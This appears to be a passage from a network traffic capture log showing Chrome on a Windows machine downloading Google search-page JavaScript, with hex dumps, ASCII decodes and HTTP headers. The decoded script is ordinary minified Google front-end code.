2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 Data Ascii: for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 Data Ascii: ("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototyp
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 Data Ascii: one)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regula
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 Data Ascii: hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Er
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: his[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototy
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 Data Ascii: tion(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.ne
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 Data Ascii: ay.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("St

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49765	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:29 UTC	1816	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=syt5,syt4,VsqSCc,sy1b7,P10Owf,sy19z,sy19x,sysj,gSZvdb,syyf,syye,WlNQGd,sysn,sysl,sysk,sysi,DPreE,syys,syyq,nabPbb,syy9,syy7,sylx,sypx,CnSW2d,kQvlef,syyr,fXO0xe?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:30 UTC	817	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 29656 Date: Thu, 12 Dec 2024 21:40:30 GMT Expires: Fri, 12 Dec 2025 21:40:30 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:30 UTC	573	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 61 65 63 3d 5f 2e 4d 64 28 22 56 73 71 53 43 63 22 2c 5b 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 57 64 63 3b 5f 2e 59 64 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 57 64 63 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 64 69 61 6c 6f 67 2f 73 68 61 72 65 22 2c 7b 61 70 70 5f 69 64 3a 22 37 33 38 30 32 36 34 38 36 33 35 31 37 39 31 22 2c 68 72 65 66 3a 5f 2e 58 64 63 28 61 29 2c 68 61 73 68 74 61 67 3a 22 23 47 6f 6f 67 6c 65 44 6f 6f 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.aec=_.Md("VsqSCc",[]);}catch(e){_._DumpException(e)}try{var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDood
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 6e 67 28 29 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 56 73 71 53 43 63 22 29 3b 0a 76 61 72 20 62 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 31 21 3d 61 2e 51 67 62 26 26 5f 2e 77 6f 62 28 61 2c 21 30 29 7d 2c 63 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 65 77 62 3d 21 31 3b 5f 2e 78 6f 62 28 61 2c 21 31 29 7d 2c 64 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 59 64 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 64 69 61 6c 6f 67 3d 6e 65 77 20 5f 2e 79 73 28 22 64 64 6c 73 68 61 72 65 2d 64 69 61 6c 6f 67 22 29 3b 74 68 69 73 2e 64 69 61 6c 6f 67 2e 65 4b 61 28 21 31 29 3b 5f 2e 41 6f 62 28 74 68 69 73 2e 64 69 61 Data Ascii: ng()};}catch(e){_._DumpException(e)}try{_.y("VsqSCc");var bec=function(a){1!=a.Qgb&&_.wob(a,!0)},cec=function(a){a.ewb=!1;_.xob(a,!1)},dec=function(){_.Yd.call(this);var a=this;this.dialog=new _.ys("ddlshare-dialog");this.dialog.eKa(!1);_.Aob(this.dia
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 68 69 73 2e 77 61 3d 67 3b 74 68 69 73 2e 64 69 61 6c 6f 67 2e 73 65 74 54 69 74 6c 65 28 74 68 69 73 2e 74 69 74 6c 65 29 7d 3b 5f 2e 47 28 65 65 63 2c 64 65 63 29 3b 65 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 63 2e 63 61 6c 6c 28 74 68 69 73 29 7d 3b 0a 65 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 61 3d 74 68 69 73 2c 62 3d 74 68 69 73 2e 64 69 61 6c 6f 67 2e 64 4d 28 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 2e 64 64 6c 73 2d 74 65 78 74 22 29 3b 62 26 26 28 62 2e 76 61 6c 75 65 3d 5f 2e 58 64 63 28 Data Ascii: his.wa=g;this.dialog.setTitle(this.title)};_.G(eec,dec);eec.prototype.rc=function(){dec.prototype.rc.call(this)};eec.prototype.show=function(){dec.prototype.show.call(this);var a=this,b=this.dialog.dM().querySelector("input.ddls-text");b&&(b.value=_.Xdc(
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 74 68 69 73 2c 61 2e 4f 61 29 3b 69 66 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 68 70 6c 6f 67 6f 20 69 6d 67 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6d 67 23 68 70 6c 6f 67 6f 22 29 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 29 7c 7c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 74 22 29 3b 76 61 72 20 62 3d 61 2b 22 20 23 47 6f 6f 67 6c 65 44 6f 6f 64 6c 65 22 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 5d 27 29 3b 63 26 26 28 62 3d 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6f 6e 74 65 6e Data Ascii: this,a.Oa);if(a=document.querySelector("#hplogo img")\|\|document.querySelector("img#hplogo")){a=a.getAttribute("title")\|\|a.getAttribute("alt");var b=a+" #GoogleDoodle",c=document.querySelector('meta[property="og:description"]');c&&(b=c.getAttribute("conten
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 21 30 29 7d 3b 70 45 2e 70 72 6f 74 6f 74 79 70 65 2e 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 61 2e 64 61 74 61 3f 62 3d 5f 2e 6b 63 28 5f 2e 56 44 2c 61 2e 64 61 74 61 29 3a 62 3d 6e 65 77 20 5f 2e 56 44 3b 62 74 64 28 74 68 69 73 2c 62 29 7d 3b 70 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 74 64 28 74 68 69 73 2c 61 2e 64 61 74 61 29 7d 3b 0a 76 61 72 20 62 74 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3b 28 62 3d 3d 6e 75 6c 6c 3f 30 3a 62 2e 5a 4a 28 29 29 26 26 28 28 63 3d 61 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 5a 4a 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 5a 4a 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e 5a 4a 28 29 7c 7c 61 2e Data Ascii: !0)};pE.prototype.wa=function(a){var b;a.data?b=_.kc(_.VD,a.data):b=new _.VD;btd(this,b)};pE.prototype.oa=function(a){btd(this,a.data)};var btd=function(a,b){var c;(b==null?0:b.ZJ())&&((c=a.data)==null?0:c.ZJ())&&(b==null?void 0:b.ZJ())!==a.data.ZJ()\|\|a.
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 6e 64 2c 5f 2e 41 29 3b 51 6e 64 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 6a 73 64 61 74 61 3a 7b 74 47 61 3a 5f 2e 56 44 7d 7d 7d 3b 51 6e 64 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 42 61 29 72 65 74 75 72 6e 21 30 3b 52 6e 64 28 74 68 69 73 29 3b 72 65 74 75 72 6e 21 31 7d 3b 51 6e 64 2e 70 72 6f 74 6f 74 79 70 65 2e 41 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 62 63 28 74 68 69 73 2e 64 61 74 61 2c 5f 2e 52 44 2c 31 34 2c 61 2e 64 61 74 61 29 3b 52 6e 64 28 74 68 69 73 29 7d 3b 0a 76 61 72 20 52 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 78 71 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 4f 6e 64 28 22 66 73 22 29 3b 61 2e 6b 61 3f 5f 2e Data Ascii: nd,_.A);Qnd.Ha=function(){return{jsdata:{tGa:_.VD}}};Qnd.prototype.oa=function(){if(this.Ba)return!0;Rnd(this);return!1};Qnd.prototype.Aa=function(a){_.bc(this.data,_.RD,14,a.data);Rnd(this)};var Rnd=function(a){_.xq(a.getRoot().el());_.Ond("fs");a.ka?_.
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 21 31 3a 62 3b 28 61 3d 74 68 69 73 2e 57 4a 28 29 2e 66 69 6e 64 28 61 29 29 26 26 74 68 69 73 2e 77 61 28 61 2c 62 29 7d 3b 5f 2e 6d 2e 57 4a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6a 64 28 74 68 69 73 2e 42 62 28 22 4e 4e 4a 4c 75 64 22 29 2e 74 6f 41 72 72 61 79 28 29 29 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 21 61 2e 6b 61 28 64 29 2e 50 56 61 28 29 7d 29 2c 63 3d 5f 2e 78 6f 28 74 68 69 73 2c 22 74 71 70 37 75 64 22 29 2e 65 6c 28 29 3b 63 26 26 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 56 44 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 56 6b 61 7d 3b 0a 5f 2e 6d 2e 50 35 62 3d Data Ascii: !1:b;(a=this.WJ().find(a))&&this.wa(a,b)};_.m.WJ=function(){var a=this,b=[].concat(_.jd(this.Bb("NNJLud").toArray())).filter(function(d){return!a.ka(d).PVa()}),c=_.xo(this,"tqp7ud").el();c&&b.push(c);return b};_.m.VDc=function(){return this.Vka};_.m.P5b=
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 2c 63 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 61 3d 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 62 66 28 61 2c 5f 2e 58 4c 63 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 67 4d 63 28 61 2c 64 2c 21 31 2c 63 29 7d 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 7d 7d 2c 67 4d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 61 3d 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 62 66 28 61 2c 5f 2e 57 4c 63 2c 6e 65 77 20 61 4d 63 28 62 2c 63 2c 64 29 29 7d 3b 5f 2e 6d 3d 5f 2e 43 41 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 62 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 41 61 7d 3b 5f 2e 6d 2e 69 45 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 61 7d 3b 5f Data Ascii: ,c);break;case 5:a=a.getRoot().el();_.bf(a,_.XLc);break;default:gMc(a,d,!1,c)}d.isSelected()}},gMc=function(a,b,c,d){a=a.getRoot().el();_.bf(a,_.WLc,new aMc(b,c,d))};_.m=_.CA.prototype;_.m.bp=function(){return this.Aa};_.m.iEc=function(){return this.Ba};_
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 61 72 20 64 3b 72 65 74 75 72 6e 28 28 64 3d 61 2e 65 6c 28 29 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 74 61 67 4e 61 6d 65 29 3d 3d 3d 0a 22 47 2d 4d 45 4e 55 2d 49 54 45 4d 22 3f 61 2e 65 6c 28 29 3a 6e 75 6c 6c 7d 3b 5f 2e 6d 3d 5f 2e 43 41 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 74 4a 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 68 4d 63 28 61 29 3b 69 66 28 62 29 7b 76 61 72 20 63 3d 61 2e 65 76 65 6e 74 3b 28 63 3d 63 3f 63 2e 77 68 69 63 68 7c 7c 63 2e 6b 65 79 43 6f 64 65 3a 6e 75 6c 6c 29 26 26 63 3d 3d 3d 33 32 3f 74 68 69 73 2e 62 72 62 28 61 29 3a 66 4d 63 28 74 68 69 73 2c 62 2c 21 30 29 7d 7d 3b 5f 2e 6d 2e 4c 35 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 6c 6c 26 26 64 4d 63 28 Data Ascii: ar d;return((d=a.el())==null?void 0:d.tagName)==="G-MENU-ITEM"?a.el():null};_.m=_.CA.prototype;_.m.tJc=function(a){var b=hMc(a);if(b){var c=a.event;(c=c?c.which\|\|c.keyCode:null)&&c===32?this.brb(a):fMc(this,b,!0)}};_.m.L5b=function(){this.oa===null&&dMc(
2024-12-12 21:40:30 UTC	1390	IN	Data Raw: 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6f 61 2c 64 3d 61 2e 57 4a 28 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 5f 2e 6f 6d 28 65 29 7d 29 3b 63 3d 3d 3d 6e 75 6c 6c 26 26 28 61 2e 6d 65 6e 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3d 3d 3d 22 30 22 7c 7c 64 2e 6c 65 6e 67 74 68 3e 30 26 26 64 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3d 3d 3d 22 30 22 29 26 26 28 63 3d 62 3f 5f 2e 79 61 28 64 29 3a 64 5b 30 5d 29 3b 63 26 26 28 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 2c 64 3d 5f 2e 59 6e 62 28 64 2c 62 3f 2d 61 2d 31 